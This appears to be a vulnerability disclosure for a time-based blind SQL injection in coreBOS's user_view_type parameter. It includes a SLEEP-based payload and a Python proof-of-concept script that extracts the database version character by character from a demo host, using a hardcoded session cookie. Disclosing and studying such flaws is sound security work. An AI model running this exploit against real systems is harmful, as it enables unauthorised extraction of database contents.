Description

coreBOS is vulnerable to Blind SQL Injections in parameter user_view_type which allows the attacker to execute SQL commands on the target database. it is a time-based attack in which the result of the query will be determined based on the time of the response.

payload

1+AND+(SELECT+8513+FROM+(SELECT(SLEEP(5-(IF(ascii(substr(version(),1,1))=53,0,5)))))ZnYh)

Proof of Concept

// Blind_SQL.py
import requests

url = "https://demo.corebos.com/"
query = "index.php?module=Calendar4You&action=Calendar4YouAjax&file=Events&typeids=1,2,4,invite,Assets,Campaigns,Contacts,cbupdater,Invoice,Potentials,CobroPago,ProductComponent&usersids=&view=agendaWeek&event_status=&task_priority=&block_status={\"event_type\":\"block\",\"module_type\":\"block\",\"et_status\":\"block\",\"task_priority\":\"block\"}&save=&start=1639353600&end=1639958400"
Database_Version = []
for i in range(21):
    for x in range(46,58):
        payload = "&user_view_type=1+AND+(SELECT+8513+FROM+(SELECT(SLEEP(2-(IF(ascii(substr(version(),{},1))={},0,5)))))ZnYh)".format(i, x)
        c = {"democoreboscom":"86b8cecae7a5f8d1e2fa41116a7e1ffc"}
        r = requests.get(url+query+payload, cookies=c, timeout=20)
        if r.elapsed.total_seconds() > 2:
            print("[+] Character number {} == {}".format(i,chr(x)))
            Database_Version.append(chr(x))
            continue
        else:
            pass

for i in Database_Version:
    print(i, end='')

Impact

This vulnerability is capable of retrieving sensitive information from the database target system.